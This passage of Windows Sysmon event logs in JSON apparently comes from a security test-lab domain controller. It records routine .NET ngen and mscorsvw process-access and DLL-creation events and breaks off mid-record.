{"EventTime":"2020-08-01 08:07:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8242,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:23.209\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22BB-5F25-0000-00108BDA1000}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:23.209","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22BB-5F25-0000-00108BDA1000}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8243,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:23.209\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BB-5F25-0000-00108BDA1000}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:23.209","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BB-5F25-0000-00108BDA1000}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8244,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:23.209\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22BB-5F25-0000-00108BDA1000}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:23.209","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22BB-5F25-0000-00108BDA1000}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8245,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:23.334\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22BB-5F25-0000-00105DDF1000}\r\nTargetProcessId: 3172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:23.334","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22BB-5F25-0000-00105DDF1000}","TargetProcessId":"3172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8246,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:23.334\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BB-5F25-0000-00105DDF1000}\r\nTargetProcessId: 3172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:23.334","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BB-5F25-0000-00105DDF1000}","TargetProcessId":"3172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8247,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:23.350\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22BB-5F25-0000-00105DDF1000}\r\nTargetProcessId: 3172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:23.350","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22BB-5F25-0000-00105DDF1000}","TargetProcessId":"3172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8248,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:24.287\r\nProcessGuid: {41C8662E-22BB-5F25-0000-00105DDF1000}\r\nProcessId: 3172\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c64-0\\System.WorkflowServices.dll\r\nCreationUtcTime: 2020-08-01 08:07:24.287","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:24.287","ProcessGuid":"{41C8662E-22BB-5F25-0000-00105DDF1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c64-0\\System.WorkflowServices.dll","CreationUtcTime":"2020-08-01 08:07:24.287","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8249,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.334\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22BC-5F25-0000-001033E81000}\r\nTargetProcessId: 656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.334","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22BC-5F25-0000-001033E81000}","TargetProcessId":"656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8250,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.334\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BC-5F25-0000-001033E81000}\r\nTargetProcessId: 656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 